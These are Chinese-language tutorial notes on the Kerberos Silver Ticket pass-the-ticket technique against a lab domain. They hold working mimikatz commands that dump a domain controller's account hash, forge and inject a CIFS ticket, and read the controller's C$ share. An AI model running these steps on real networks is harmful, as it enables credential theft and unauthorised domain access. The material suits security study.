票据传递攻击(PTT) 白银票据

白银票据就是伪造ST（弊端：仅能访问对应的server）

黄金票据和白银票据的一些区别：Golden Ticket：伪造TGT，可以获取任何 Kerberos 服务权限，且由 krbtgt 的 hash 加密，金票在使用的过程需要和域控通信

白银票据：伪造 TGS ，只能访问指定的服务，且由服务账号（通常为计算机账户）的 Hash 加密 ，银票在使用的过程不需要同域控通信

只要知server hash值，可伪造

白银票据的伪造条件

1.域名称(shell net config workstation )

2.域的SID值(shell whoami /user)

3.目标服务器名

4.可利用的服务

5.服务账号的NTML HASH

6.需要伪造的用户名

#在域控上导出 DC$ 的 HASH
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords"

#利用 DC$ 的 Hash制作一张 cifs 服务的白银票据
kerberos::golden /domain:dbapp.lab /sid:S-1-5-21-2476688485-4256841910-2155116890 /target:dc.dbapp.lab /rc4:e04acc2eb374a5415528afa085b5463b /service:cifs /user:user /ticket:sliver.kirbi


kerberos::purge  # 清理票据

kerberos::list # 查看票据

kerberos::ptt sliver.kirbi # 注入票据

#cifs是指的文件共享服务，有了 cifs 服务权限，就可以访问域控制器的文件系统
dir \\dc.dbapp.lab\C$